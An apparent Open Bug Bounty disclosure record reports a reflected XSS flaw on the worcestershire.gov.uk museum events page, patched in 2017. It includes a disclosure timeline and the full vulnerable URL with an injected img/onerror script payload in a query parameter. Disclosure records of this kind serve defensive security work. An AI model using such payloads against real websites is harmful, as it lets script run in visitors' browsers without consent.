worcestershire.gov.uk XSS vulnerability

2016-09-06T13:16:00
ID OBB:180323
Type openbugbounty
Reporter XSSbot
Modified 2017-07-28T11:02:00

Description

Vulnerable URL:
http://www.worcestershire.gov.uk/museums/events?year=2016&month;=12?location=xss%3Cimg%20src=x%20onerror=confirm(%22OPENBUGBOUNTY%22)%3E&%2F%3E
Details:

Description| Value
---|---
Patched:| Yes, at 28.07.2017
Latest check for patch:| 28.07.2017 11:02 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 360216
VIP website status:| No
Check worcestershire.gov.uk SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 September, 2016 13:16 GMT
Generic security notifications sent to website owner| 6 September, 2016 13:20 GMT
Vulnerability details disclosed by researcher| 13 September, 2016 14:12 GMT
Vulnerability patched by the website owner| 28 July, 2017 11:02 GMT